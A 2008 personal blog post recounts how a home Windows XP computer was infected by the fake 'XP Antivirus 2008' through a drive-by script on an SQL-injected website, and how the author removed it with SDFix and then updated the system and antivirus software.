|
How did I get the XP AntiVirus 2008?
|
|
|
One of the computers in our household obtained a drive-by virus infection recently. This particular infection is one of the famous backdoor Trojans that arrive by exploiting browser security from a web site that would otherwise seem harmless. The web site in question already was infected by the server SQL Injection exploit, which was replacing the web pages with ones that framed the content and contained malware JavaScript.
The computer in question was running Windows XP service pack 2, in a non-administrative account, with a 20-day old Symantec Antivirus 7.x virus list.
Why would anyone bother? In this case, the software that was loaded had all sorts of powers. It was malware, spy ware, and blackmail ware all in a blended threat. One piece attempts to open a back door to your computer, so that it can be controlled in a botnet. A botnet can be used to send internet traffic such as denial of service attacks, spam emails, and deliver other content. Another malware program brings in other software that shows up and attempts to blackmail you into buying it so that your computer will continue to work.
Here is what happened.
The user of the computer, whose name shall not be used,
surfed to a site owned by the National Park Service called livetheriver.org. The
infected Apache web server was had a text substitution script that was
attempting to force browser clients to run a script file called ngg.js. The
infected Apache/Linux servers most likely have been hit with SQL injection attacks.
Web sites that catalog content using a database are susceptible.
The infected web servers then help to propagate malware to
Windows-based client computers. In this case, our computer’s Internet Explorer loaded
and ran the script. One run, a number of pieces of malware were loaded on the
PC. This included the ASPROX Trojan proxy server, the BraviaX downloader, and
the beep.sys rootkit. Once the BraviaX started, it loaded the XP Antivirus 2008
software.
Once the XP Antivirus 2008 started, then it warned that
there was a spyware infection. It tells you to send you credit card information
to some company in the Ukraine.
The ironic part is that it IS the infection. It reminded me of Syndrome, the
antagonist in the movie The Incredibles. Syndrome sends a robot to destroy the
city, then appears to fight the robot to save the city.
Fortunately, the good guys are sticking right with the bad
guys. Andy Manchesta has a life saving program called SDFix.
http://downloads.andymanchesta.com/RemovalTools/SDFix_ReadMe.htm
I ran SDFix to clear the malware. I booted up Windows XP in
safe mode, and copied the program from a CD. With the beep.sys loaded, you
cannot run the anti cool web search tool or Hijackthis. It knows the name of
the program and blocks it from starting. Future versions may also prevent SDFix
from running, so you may have to rename the program.
Afterwards, I updated the computer to newly released XP
service pack 3. I uninstalled Symantec/Norton, and installed AVG antivirus free
version 8. I have been using the 7.5 on my Windows Vista system since March
2007. I ran a scan and it found all the suspect files including the infected
web pages in the browser cache. It also found files in the System Volume
Information directory. This keeps on showing up during scans, so I may have to
follow up on a way to clear that out.
I also installed Spybot search and destroy, which claims to
be able to catch these threats. Note that Opera, Safari, Mozilla FireFox and
Internet Explorer all have vulnerabilities that have been exploited by this
malware group.
More helpful links:
Balloon Saying "your Computer Is Infected With
Spyware" Most Likely Malware
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t134064.html
So how did I get infected in the first place?
http://forums.whatthetech.com/So_how_did_I_get_infected_in_the_first_place_t57817.html
How the medichi rootkit works (also using beep.sys)
http://www.greatis.com/security/medichi_exe_murka_dat_rootkit.htm
More about the System Volume Information directory
http://www.theeldergeek.com/system_volume_information_folder1.htm
More about braviax
http://www.cmilner.com/crapware.php
AVG Antivirus
http://www.grisoft.com
Free version 8.0 Antivirus at
http://free.avg.com/
Spybot Search and Destroy
http://www.safer-networking.org
|
|
|
|
Posted on Thursday, July 03, 2008 @ 11:58:46 UTC by BB
|
|
|
|
"How did I get the XP AntiVirus 2008?" | Login/Create an Account | 0 comments |
| The comments are owned by the poster. We aren't responsible for their content. |
|
|
|
|
|
No Comments Allowed for Anonymous, please register |
|
|
|
|
|